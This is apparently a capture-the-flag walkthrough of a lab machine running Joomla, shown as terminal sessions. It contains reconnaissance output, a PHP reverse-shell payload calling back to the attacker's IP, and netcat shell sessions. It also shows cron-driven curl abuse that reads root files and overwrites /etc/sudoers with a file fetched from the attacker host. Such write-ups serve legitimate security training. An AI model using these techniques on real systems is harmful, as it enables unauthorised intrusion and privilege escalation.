$ nmap -T4 -A -p- 10.10.10.150
Starting Nmap 7.91 ( https://nmap.org ) at 2020-11-20 15:24 CET
Stats: 0:04:29 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 69.55% done; ETC: 15:31 (0:01:58 remaining)
Stats: 0:06:30 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 83.37% done; ETC: 15:32 (0:01:18 remaining)
Stats: 0:08:28 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 96.73% done; ETC: 15:33 (0:00:17 remaining)
Warning: 10.10.10.150 giving up on port because retransmission cap hit (6).
Nmap scan report for 10.10.10.150
Host is up (0.063s latency).
Not shown: 65532 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 8a:d1:69:b4:90:20:3e:a7:b6:54:01:eb:68:30:3a:ca (RSA)
| 256 9f:0b:c2:b2:0b:ad:8f:a1:4e:0b:f6:33:79:ef:fb:43 (ECDSA)
|_ 256 c1:2a:35:44:30:0c:5b:56:6a:3f:a5:cc:64:66:d9:a9 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-generator: Joomla! - Open Source Content Management
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Home
24259/tcp filtered unknown
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 551.88 seconds
$ gobuster -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt dir -u http://10.10.10.150 -e
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://10.10.10.150
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Expanded: true
[+] Timeout: 10s
===============================================================
2020/11/20 15:37:47 Starting gobuster
===============================================================
http://10.10.10.150/images (Status: 301)
http://10.10.10.150/templates (Status: 301)
http://10.10.10.150/media (Status: 301)
http://10.10.10.150/modules (Status: 301)
http://10.10.10.150/bin (Status: 301)
http://10.10.10.150/plugins (Status: 301)
http://10.10.10.150/includes (Status: 301)
http://10.10.10.150/language (Status: 301)
http://10.10.10.150/components (Status: 301)
http://10.10.10.150/cache (Status: 301)
http://10.10.10.150/libraries (Status: 301)
http://10.10.10.150/tmp (Status: 301)
http://10.10.10.150/layouts (Status: 301)
http://10.10.10.150/administrator (Status: 301)
http://10.10.10.150/cli (Status: 301)
http://10.10.10.150/server-status (Status: 403)
[ERROR] 2020/11/20 16:01:39 [!] Get http://10.10.10.150/Mexico_City: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
===============================================================
2020/11/20 16:05:40 Finished
===============================================================
If we access to http://10.10.10.150/administrator/, we’ll find a Joomla login form.
Accessing to http://10.10.10.150,
Based on the published post there are these users:
- Super User
- Floris
Watching on the source code, there is a suspicious secret.txt file somewhere.
</div>
</footer>
</body>
<!-- secret.txt -->
</html>
http://10.10.10.150/secret.txt
Q3VybGluZzIwMTgh
This string seems to be encoded.
Searching for: «linux decode string», Google give us the suggestion of base64. It worth to give it a fast try.
$ echo Q3VybGluZzIwMTgh | base64 --decode
Curling2018!
Now we have 2 possible user names and a password.
Let’s try to use them into the Joomla admin site:
From the Joomla template edit section can be added a php reverse shell directly:
Using the Pestmonkey php reverse shell (https://github.com/pentestmonkey/php-reverse-shell)
<?php
set_time_limit (0);
$VERSION = "1.0";
$ip = '10.10.14.14'; // CHANGE THIS
$port = 1234; // CHANGE THIS
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; /bin/sh -i';
$daemon = 0;
$debug = 0;
...
$ nc -lvnp 1234
listening on [any] 1234 ...
connect to [10.10.14.14] from (UNKNOWN) [10.10.10.150] 39474
Linux curling 4.15.0-22-generic #24-Ubuntu SMP Wed May 16 12:15:17 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
10:29:30 up 17:01, 0 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ whoami
www-data
$ cd /home/floris
$ ls -la
total 44
drwxr-xr-x 6 floris floris 4096 May 22 2018 .
drwxr-xr-x 3 root root 4096 May 22 2018 ..
lrwxrwxrwx 1 root root 9 May 22 2018 .bash_history -> /dev/null
-rw-r--r-- 1 floris floris 220 Apr 4 2018 .bash_logout
-rw-r--r-- 1 floris floris 3771 Apr 4 2018 .bashrc
drwx------ 2 floris floris 4096 May 22 2018 .cache
drwx------ 3 floris floris 4096 May 22 2018 .gnupg
drwxrwxr-x 3 floris floris 4096 May 22 2018 .local
-rw-r--r-- 1 floris floris 807 Apr 4 2018 .profile
drwxr-x--- 2 root floris 4096 May 22 2018 admin-area
-rw-r--r-- 1 floris floris 1076 May 22 2018 password_backup
-rw-r----- 1 floris floris 33 May 22 2018 user.txt
We don’t have permission to read user.txt, but password_backup is readable for everyone.
$ cat password_backup
00000000: 425a 6839 3141 5926 5359 819b bb48 0000 BZh91AY&SY...H..
00000010: 17ff fffc 41cf 05f9 5029 6176 61cc 3a34 ....A...P)ava.:4
00000020: 4edc cccc 6e11 5400 23ab 4025 f802 1960 N...n.T.#.@%...`
00000030: 2018 0ca0 0092 1c7a 8340 0000 0000 0000 ......z.@......
00000040: 0680 6988 3468 6469 89a6 d439 ea68 c800 ..i.4hdi...9.h..
00000050: 000f 51a0 0064 681a 069e a190 0000 0034 ..Q..dh........4
00000060: 6900 0781 3501 6e18 c2d7 8c98 874a 13a0 i...5.n......J..
00000070: 0868 ae19 c02a b0c1 7d79 2ec2 3c7e 9d78 .h...*..}y..<~.x
00000080: f53e 0809 f073 5654 c27a 4886 dfa2 e931 .>...sVT.zH....1
00000090: c856 921b 1221 3385 6046 a2dd c173 0d22 .V...!3.`F...s."
000000a0: b996 6ed4 0cdb 8737 6a3a 58ea 6411 5290 ..n....7j:X.d.R.
000000b0: ad6b b12f 0813 8120 8205 a5f5 2970 c503 .k./... ....)p..
000000c0: 37db ab3b e000 ef85 f439 a414 8850 1843 7..;.....9...P.C
000000d0: 8259 be50 0986 1e48 42d5 13ea 1c2a 098c .Y.P...HB....*..
000000e0: 8a47 ab1d 20a7 5540 72ff 1772 4538 5090 .G.. .U@r..rE8P.
000000f0: 819b bb48 ...H
$
It is a binary file and according to the file signature, it is a Bzip2 file.
Using Cyberchef:
After several Decompress processes we obtain:
Password = 5d<wdCbdZu)|hChXll
Now let’s try to use the ssh open port:
user = `floris`
password = `5d<wdCbdZu)|hChXll`
$ ssh floris@10.10.10.150
floris@10.10.10.150's password:
Welcome to Ubuntu 18.04 LTS (GNU/Linux 4.15.0-22-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Mon Nov 23 11:09:11 UTC 2020
System load: 0.01 Processes: 174
Usage of /: 46.4% of 9.78GB Users logged in: 0
Memory usage: 24% IP address for ens33: 10.10.10.150
Swap usage: 0%
* Canonical Livepatch is available for installation.
- Reduce system reboots and improve kernel security. Activate at:
https://ubuntu.com/livepatch
0 packages can be updated.
0 updates are security updates.
Last login: Mon May 28 17:00:48 2018 from 192.168.1.71
floris@curling:~$
floris@curling:~$ ls
admin-area password_backup user.txt
floris@curling:~$ cat user.txt
65ddXXXXXXXXXXXXXXXXXXXXXXXXXXXX
To get our root’s flag we start using Pspy.
pspy is a command line tool designed to snoop on processes without need for root permissions. It allows you to see commands run by other users, cron jobs, etc. as they execute.
https://github.com/DominicBreuker/pspy
Our architecture’s box is x64, so we need to download pspy64.
https://github.com/DominicBreuker/pspy/releases/download/v1.2.0/pspy64
floris@curling:~$ wget http://10.10.14.14:8000/pspy64
--2020-11-30 09:34:47-- http://10.10.14.14:8000/pspy64
Connecting to 10.10.14.14:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3078592 (2.9M) [application/octet-stream]
Saving to: ‘pspy64’
pspy64 100%[===========================================>] 2.94M 1.44MB/s in 2.0s
2020-11-30 09:34:49 (1.44 MB/s) - ‘pspy64’ saved [3078592/3078592]
floris@curling:~$ ls -la
total 3052
drwxr-xr-x 6 floris floris 4096 Nov 30 09:34 .
drwxr-xr-x 3 root root 4096 May 22 2018 ..
drwxr-x--- 2 root floris 4096 May 22 2018 admin-area
lrwxrwxrwx 1 root root 9 May 22 2018 .bash_history -> /dev/null
-rw-r--r-- 1 floris floris 220 Apr 4 2018 .bash_logout
-rw-r--r-- 1 floris floris 3771 Apr 4 2018 .bashrc
drwx------ 2 floris floris 4096 May 22 2018 .cache
drwx------ 3 floris floris 4096 May 22 2018 .gnupg
drwxrwxr-x 3 floris floris 4096 May 22 2018 .local
-rw-r--r-- 1 floris floris 1076 May 22 2018 password_backup
-rw-r--r-- 1 floris floris 807 Apr 4 2018 .profile
-rw-rw-r-- 1 floris floris 3078592 Nov 30 09:24 pspy64
-rw-r----- 1 floris floris 33 May 22 2018 user.txt
floris@curling:~$ chmod +x pspy64
floris@curling:~$ ./pspy64
pspy - version: v1.2.0 - Commit SHA: 9c63e5d6c58f7bcdc235db663f5e3fe1c33b8855
Config: Printing events (colored=true): processes=true | file-system-events=false ||| Scannning for processes every 100ms and on inotify events ||| Watching directories: [/usr /tmp /etc /home /var /opt] (recursive) | [] (non-recursive)
Draining file system events due to startup...
done
2020/11/30 09:38:35 CMD: UID=0 PID=84 |
2020/11/30 09:38:35 CMD: UID=101 PID=835 | /lib/systemd/systemd-resolved
2020/11/30 09:38:35 CMD: UID=100 PID=818 | /lib/systemd/systemd-networkd
2020/11/30 09:38:35 CMD: UID=0 PID=8 |
2020/11/30 09:38:35 CMD: UID=0 PID=7 |
2020/11/30 09:38:35 CMD: UID=62583 PID=615 | /lib/systemd/systemd-timesyncd
2020/11/30 09:38:35 CMD: UID=0 PID=6 |
2020/11/30 09:38:35 CMD: UID=0 PID=550 |
2020/11/30 09:38:35 CMD: UID=0 PID=509 | /lib/systemd/systemd-udevd
2020/11/30 09:38:35 CMD: UID=0 PID=504 | /sbin/lvmetad -f
2020/11/30 09:38:35 CMD: UID=0 PID=493 |
2020/11/30 09:38:35 CMD: UID=0 PID=487 |
2020/11/30 09:38:35 CMD: UID=0 PID=486 |
2020/11/30 09:38:35 CMD: UID=0 PID=484 | /lib/systemd/systemd-journald
2020/11/30 09:38:35 CMD: UID=0 PID=476 | /usr/bin/vmtoolsd
2020/11/30 09:38:35 CMD: UID=0 PID=42 |
2020/11/30 09:38:35 CMD: UID=0 PID=242 |
2020/11/30 09:38:35 CMD: UID=1000 PID=2414 | ./pspy64
2020/11/30 09:38:35 CMD: UID=0 PID=241 |
2020/11/30 09:38:35 CMD: UID=0 PID=237 |
2020/11/30 09:38:35 CMD: UID=1000 PID=2363 | -bash
2020/11/30 09:38:35 CMD: UID=1000 PID=2362 | sshd: floris@pts/0
2020/11/30 09:38:35 CMD: UID=0 PID=236 |
2020/11/30 09:38:35 CMD: UID=0 PID=230 |
2020/11/30 09:38:35 CMD: UID=0 PID=229 |
2020/11/30 09:38:35 CMD: UID=1000 PID=2287 | (sd-pam)
2020/11/30 09:38:35 CMD: UID=1000 PID=2286 | /lib/systemd/systemd --user
2020/11/30 09:38:35 CMD: UID=0 PID=228 |
2020/11/30 09:38:35 CMD: UID=0 PID=2277 | sshd: floris [priv]
2020/11/30 09:38:35 CMD: UID=0 PID=2276 |
2020/11/30 09:38:35 CMD: UID=0 PID=18 |
2020/11/30 09:38:35 CMD: UID=33 PID=1776 | /usr/sbin/apache2 -k start
2020/11/30 09:38:35 CMD: UID=33 PID=1774 | /usr/sbin/apache2 -k start
2020/11/30 09:38:35 CMD: UID=33 PID=1772 | /usr/sbin/apache2 -k start
2020/11/30 09:38:35 CMD: UID=33 PID=1771 | /usr/sbin/apache2 -k start
2020/11/30 09:38:35 CMD: UID=33 PID=1770 | /usr/sbin/apache2 -k start
2020/11/30 09:38:35 CMD: UID=33 PID=1769 | /usr/sbin/apache2 -k start
2020/11/30 09:38:35 CMD: UID=33 PID=1768 | /usr/sbin/apache2 -k start
2020/11/30 09:38:35 CMD: UID=33 PID=1767 | /usr/sbin/apache2 -k start
2020/11/30 09:38:35 CMD: UID=0 PID=176 |
2020/11/30 09:38:35 CMD: UID=0 PID=173 |
2020/11/30 09:38:35 CMD: UID=0 PID=16 |
2020/11/30 09:38:35 CMD: UID=0 PID=15 |
2020/11/30 09:38:35 CMD: UID=0 PID=14 |
2020/11/30 09:38:35 CMD: UID=33 PID=1365 | /usr/sbin/apache2 -k start
2020/11/30 09:38:35 CMD: UID=33 PID=1360 | /usr/sbin/apache2 -k start
2020/11/30 09:38:35 CMD: UID=0 PID=1340 | /usr/sbin/apache2 -k start
2020/11/30 09:38:35 CMD: UID=0 PID=13 |
2020/11/30 09:38:35 CMD: UID=111 PID=1272 | /usr/sbin/mysqld --daemonize --pid-file=/run/mysqld/mysqld.pid
2020/11/30 09:38:35 CMD: UID=0 PID=1230 | /sbin/agetty -o -p -- \u --noclear tty1 linux
2020/11/30 09:38:35 CMD: UID=0 PID=121 |
2020/11/30 09:38:35 CMD: UID=0 PID=12 |
2020/11/30 09:38:35 CMD: UID=0 PID=1176 | /usr/lib/policykit-1/polkitd --no-debug
2020/11/30 09:38:35 CMD: UID=0 PID=1162 | /usr/sbin/sshd -D
2020/11/30 09:38:35 CMD: UID=0 PID=1142 | /sbin/iscsid
2020/11/30 09:38:35 CMD: UID=0 PID=1138 | /sbin/iscsid
2020/11/30 09:38:35 CMD: UID=0 PID=1100 | /usr/lib/snapd/snapd
2020/11/30 09:38:35 CMD: UID=0 PID=11 |
2020/11/30 09:38:35 CMD: UID=0 PID=1091 | /usr/sbin/irqbalance --foreground
2020/11/30 09:38:35 CMD: UID=0 PID=1089 | /usr/sbin/cron -f
2020/11/30 09:38:35 CMD: UID=103 PID=1057 | /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only
2020/11/30 09:38:35 CMD: UID=0 PID=1056 | /lib/systemd/systemd-logind
2020/11/30 09:38:35 CMD: UID=0 PID=1055 | /usr/bin/python3 /usr/bin/networkd-dispatcher
2020/11/30 09:38:35 CMD: UID=0 PID=104 |
2020/11/30 09:38:35 CMD: UID=0 PID=1036 | /usr/sbin/atd -f
2020/11/30 09:38:35 CMD: UID=102 PID=1028 | /usr/sbin/rsyslogd -n
2020/11/30 09:38:35 CMD: UID=0 PID=1023 | /usr/bin/lxcfs /var/lib/lxcfs/
2020/11/30 09:38:35 CMD: UID=0 PID=1018 | /usr/bin/VGAuthService
2020/11/30 09:38:35 CMD: UID=0 PID=1014 | /usr/lib/accountsservice/accounts-daemon
2020/11/30 09:38:35 CMD: UID=0 PID=10 |
2020/11/30 09:38:35 CMD: UID=0 PID=1 | /sbin/init maybe-ubiquity
2020/11/30 09:39:01 CMD: UID=0 PID=2441 | curl -K /home/floris/admin-area/input -o /home/floris/admin-area/report
2020/11/30 09:39:01 CMD: UID=0 PID=2440 | sleep 1
2020/11/30 09:39:01 CMD: UID=0 PID=2439 | /bin/sh -c curl -K /home/floris/admin-area/input -o /home/floris/admin-area/report
2020/11/30 09:39:01 CMD: UID=0 PID=2438 |
2020/11/30 09:39:01 CMD: UID=0 PID=2437 | /bin/sh -c sleep 1; cat /root/default.txt > /home/floris/admin-area/input
2020/11/30 09:39:01 CMD: UID=0 PID=2436 | /usr/sbin/CRON -f
2020/11/30 09:39:01 CMD: UID=0 PID=2435 | /usr/sbin/CRON -f
2020/11/30 09:39:01 CMD: UID=0 PID=2434 | /usr/sbin/CRON -f
2020/11/30 09:39:09 CMD: UID=0 PID=2443 | (ionclean)
2020/11/30 09:39:09 CMD: UID=0 PID=2453 | /bin/sh -e /usr/lib/php/sessionclean
2020/11/30 09:39:09 CMD: UID=0 PID=2452 | /bin/sh -e /usr/lib/php/sessionclean
2020/11/30 09:39:09 CMD: UID=0 PID=2451 | /bin/sh /usr/sbin/phpquery -V
2020/11/30 09:39:09 CMD: UID=0 PID=2450 | sort -rn -t: -k2,2
2020/11/30 09:39:09 CMD: UID=0 PID=2449 | /bin/sh -e /usr/lib/php/sessionclean
2020/11/30 09:39:09 CMD: UID=0 PID=2468 | /lib/systemd/systemd-udevd
2020/11/30 09:39:09 CMD: UID=0 PID=2467 | /lib/systemd/systemd-udevd
2020/11/30 09:39:09 CMD: UID=0 PID=2466 | /lib/systemd/systemd-udevd
2020/11/30 09:39:09 CMD: UID=0 PID=2465 | /lib/systemd/systemd-udevd
2020/11/30 09:39:09 CMD: UID=0 PID=2464 | /lib/systemd/systemd-udevd
2020/11/30 09:39:09 CMD: UID=0 PID=2463 | /lib/systemd/systemd-udevd
2020/11/30 09:39:09 CMD: UID=0 PID=2462 | /lib/systemd/systemd-udevd
2020/11/30 09:39:09 CMD: UID=0 PID=2461 | /lib/systemd/systemd-udevd
2020/11/30 09:39:09 CMD: UID=0 PID=2460 | php7.2 -c /etc/php/7.2/apache2/php.ini -d error_reporting='~E_ALL' -r foreach(ini_get_all("session") as $k => $v) echo "$k=".$v["local_value"]."\n";
2020/11/30 09:39:09 CMD: UID=0 PID=2469 |
2020/11/30 09:39:09 CMD: UID=0 PID=2472 | sed -ne s/^session\.save_handler=\(.*\)$/\1/p
2020/11/30 09:39:09 CMD: UID=0 PID=2470 | /bin/sh -e /usr/lib/php/sessionclean
2020/11/30 09:39:09 CMD: UID=0 PID=2481 |
2020/11/30 09:39:09 CMD: UID=0 PID=2479 | /bin/sh -e /usr/lib/php/sessionclean
2020/11/30 09:39:09 CMD: UID=0 PID=2482 | php7.2 -c /etc/php/7.2/cli/php.ini -d error_reporting='~E_ALL' -r foreach(ini_get_all("session") as $k => $v) echo "$k=".$v["local_value"]."\n";
2020/11/30 09:39:09 CMD: UID=0 PID=2485 | /bin/sh -e /usr/lib/php/sessionclean
2020/11/30 09:39:09 CMD: UID=0 PID=2483 | /bin/sh -e /usr/lib/php/sessionclean
2020/11/30 09:39:09 CMD: UID=??? PID=2486 | ???
2020/11/30 09:39:09 CMD: UID=0 PID=2491 | sed -ne s/^session\.gc_maxlifetime=\(.*\)$/\1/p
2020/11/30 09:39:09 CMD: UID=0 PID=2490 | /bin/sh -e /usr/lib/php/sessionclean
2020/11/30 09:39:09 CMD: UID=0 PID=2489 | /bin/sh -e /usr/lib/php/sessionclean
2020/11/30 09:39:09 CMD: UID=0 PID=2493 | /bin/sh -e /usr/lib/php/sessionclean
2020/11/30 09:39:09 CMD: UID=0 PID=2492 | /bin/sh -e /usr/lib/php/sessionclean
2020/11/30 09:39:09 CMD: UID=0 PID=2495 | pidof apache2 php7.2
2020/11/30 09:39:09 CMD: UID=0 PID=2497 | find /proc/1774/fd -ignore_readdir_race -lname /var/lib/php/sessions/sess_* -exec touch -c {} ;
2020/11/30 09:39:09 CMD: UID=0 PID=2498 | find /proc/1772/fd -ignore_readdir_race -lname /var/lib/php/sessions/sess_* -exec touch -c {} ;
2020/11/30 09:39:09 CMD: UID=0 PID=2499 | find /proc/1771/fd -ignore_readdir_race -lname /var/lib/php/sessions/sess_* -exec touch -c {} ;
2020/11/30 09:39:09 CMD: UID=??? PID=2500 | ???
2020/11/30 09:39:09 CMD: UID=0 PID=2501 | find /proc/1769/fd -ignore_readdir_race -lname /var/lib/php/sessions/sess_* -exec touch -c {} ;
2020/11/30 09:39:09 CMD: UID=0 PID=2502 |
2020/11/30 09:39:09 CMD: UID=0 PID=2503 | find /proc/1767/fd -ignore_readdir_race -lname /var/lib/php/sessions/sess_* -exec touch -c {} ;
2020/11/30 09:39:09 CMD: UID=0 PID=2504 | find /proc/1365/fd -ignore_readdir_race -lname /var/lib/php/sessions/sess_* -exec touch -c {} ;
2020/11/30 09:39:09 CMD: UID=0 PID=2507 | find -O3 /var/lib/php/sessions/ -ignore_readdir_race -depth -mindepth 1 -name sess_* -type f -cmin +24 -delete
2020/11/30 09:39:09 CMD: UID=0 PID=2513 |
2020/11/30 09:39:09 CMD: UID=0 PID=2510 |
2020/11/30 09:40:01 CMD: UID=0 PID=2527 | curl -K /home/floris/admin-area/input -o /home/floris/admin-area/report
2020/11/30 09:40:01 CMD: UID=0 PID=2526 | /bin/sh -c sleep 1; cat /root/default.txt > /home/floris/admin-area/input
2020/11/30 09:40:01 CMD: UID=0 PID=2525 | /bin/sh -c curl -K /home/floris/admin-area/input -o /home/floris/admin-area/report
2020/11/30 09:40:01 CMD: UID=0 PID=2523 | /usr/sbin/CRON -f
2020/11/30 09:40:01 CMD: UID=0 PID=2522 | /usr/sbin/CRON -f
2020/11/30 09:40:01 CMD: UID=0 PID=2528 | sleep 1
2020/11/30 09:41:01 CMD: UID=0 PID=2533 | sleep 1
2020/11/30 09:41:01 CMD: UID=0 PID=2532 | /bin/sh -c sleep 1; cat /root/default.txt > /home/floris/admin-area/input
2020/11/30 09:41:01 CMD: UID=0 PID=2531 | /usr/sbin/CRON -f
2020/11/30 09:41:01 CMD: UID=0 PID=2530 | /usr/sbin/CRON -f
2020/11/30 09:41:01 CMD: UID=0 PID=2535 | /bin/sh -c curl -K /home/floris/admin-area/input -o /home/floris/admin-area/report
2020/11/30 09:41:01 CMD: UID=0 PID=2534 | /bin/sh -c curl -K /home/floris/admin-area/input -o /home/floris/admin-area/report
2020/11/30 09:42:01 CMD: UID=0 PID=2541 | sleep 1
2020/11/30 09:42:01 CMD: UID=0 PID=2540 | /bin/sh -c curl -K /home/floris/admin-area/input -o /home/floris/admin-area/report
2020/11/30 09:42:01 CMD: UID=0 PID=2539 | /bin/sh -c sleep 1; cat /root/default.txt > /home/floris/admin-area/input
2020/11/30 09:42:01 CMD: UID=0 PID=2538 | /usr/sbin/CRON -f
2020/11/30 09:42:01 CMD: UID=0 PID=2537 | /usr/sbin/CRON -f
2020/11/30 09:42:01 CMD: UID=0 PID=2542 | curl -K /home/floris/admin-area/input -o /home/floris/admin-area/report
2020/11/30 09:42:02 CMD: UID=0 PID=2543 | cat /root/default.txt
We have some suspicious entries here:
...
2020/11/30 09:39:01 CMD: UID=0 PID=2441 | curl -K /home/floris/admin-area/input -o /home/floris/admin-area/report
2020/11/30 09:39:01 CMD: UID=0 PID=2439 | /bin/sh -c curl -K /home/floris/admin-area/input -o /home/floris/admin-area/report
2020/11/30 09:39:01 CMD: UID=0 PID=2437 | /bin/sh -c sleep 1; cat /root/default.txt > /home/floris/admin-area/input
2020/11/30 09:40:01 CMD: UID=0 PID=2527 | curl -K /home/floris/admin-area/input -o /home/floris/admin-area/report
2020/11/30 09:40:01 CMD: UID=0 PID=2526 | /bin/sh -c sleep 1; cat /root/default.txt > /home/floris/admin-area/input
2020/11/30 09:40:01 CMD: UID=0 PID=2525 | /bin/sh -c curl -K /home/floris/admin-area/input -o /home/floris/admin-area/report
2020/11/30 09:41:01 CMD: UID=0 PID=2532 | /bin/sh -c sleep 1; cat /root/default.txt > /home/floris/admin-area/input
2020/11/30 09:41:01 CMD: UID=0 PID=2535 | /bin/sh -c curl -K /home/floris/admin-area/input -o /home/floris/admin-area/report
2020/11/30 09:41:01 CMD: UID=0 PID=2534 | /bin/sh -c curl -K /home/floris/admin-area/input -o /home/floris/admin-area/report
2020/11/30 09:42:01 CMD: UID=0 PID=2540 | /bin/sh -c curl -K /home/floris/admin-area/input -o /home/floris/admin-area/report
2020/11/30 09:42:01 CMD: UID=0 PID=2539 | /bin/sh -c sleep 1; cat /root/default.txt > /home/floris/admin-area/input 2020/11/30 09:42:01 CMD: UID=0 PID=2542 | curl -K /home/floris/admin-area/input -o /home/floris/admin-area/report
...
This entry is being repeatedly executed by root.
/bin/sh -c curl -K /home/floris/admin-area/input -o /home/floris/admin-area/report
It seems to be under a cron job.
This entry runs curl command with option -K and -o.
-K, --config <file>: Specify a text file to read curl arguments from.
-o, --output <file>: Write output to <file> instead of stdout.
Then it runs curl using the input file and outputs the command results into the report file.
floris@curling:~/admin-area$ echo "url = \"file:///root/root.txt\"" > input
floris@curling:~/admin-area$ cat input
url = "file:///root/root.txt"
floris@curling:~/admin-area$ ls -la
total 28
drwxr-x--- 2 root floris 4096 May 22 2018 .
drwxr-xr-x 6 floris floris 4096 Nov 30 09:34 ..
-rw-rw---- 1 root floris 30 Nov 30 10:25 input
-rw-rw---- 1 root floris 14236 Nov 30 10:25 report
floris@curling:~/admin-area$ ls -la
total 16
drwxr-x--- 2 root floris 4096 May 22 2018 .
drwxr-xr-x 6 floris floris 4096 Nov 30 09:34 ..
-rw-rw---- 1 root floris 30 Nov 30 10:25 input
-rw-rw---- 1 root floris 33 Nov 30 10:26 report
floris@curling:~/admin-area$ cat report
82c1XXXXXXXXXXXXXXXXXXXXXXXXXXXX
What if we want a shell?
$ cat sudoers.txt
root ALL=(ALL:ALL) ALL
floris ALL=(ALL:ALL) ALL
$ python3 -m http.server 8080
Serving HTTP on 0.0.0.0 port 8080 (http://0.0.0.0:8080/) ...
10.10.10.150 - - [30/Nov/2020 11:58:01] "GET /sudoers.txt HTTP/1.1" 200 -
floris@curling:~/admin-area$ echo -e 'url = "http://10.10.14.14:8080/sudoers.txt"\noutput = "/etc/sudoers"' > input
echo -e option = enable interpretation of backslash escapes
floris@curling:~/admin-area$ cat input
url = "http://10.10.14.14:8080/sudoers.txt"
output = "/etc/sudoers"
floris@curling:~/admin-area$ sudo su root
[sudo] password for floris:
root@curling:/home/floris/admin-area#
root@curling:/home/floris/admin-area# whoami
root
root@curling:/home/floris/admin-area# cat /root/root.txt
82c1XXXXXXXXXXXXXXXXXXXXXXXXXXXX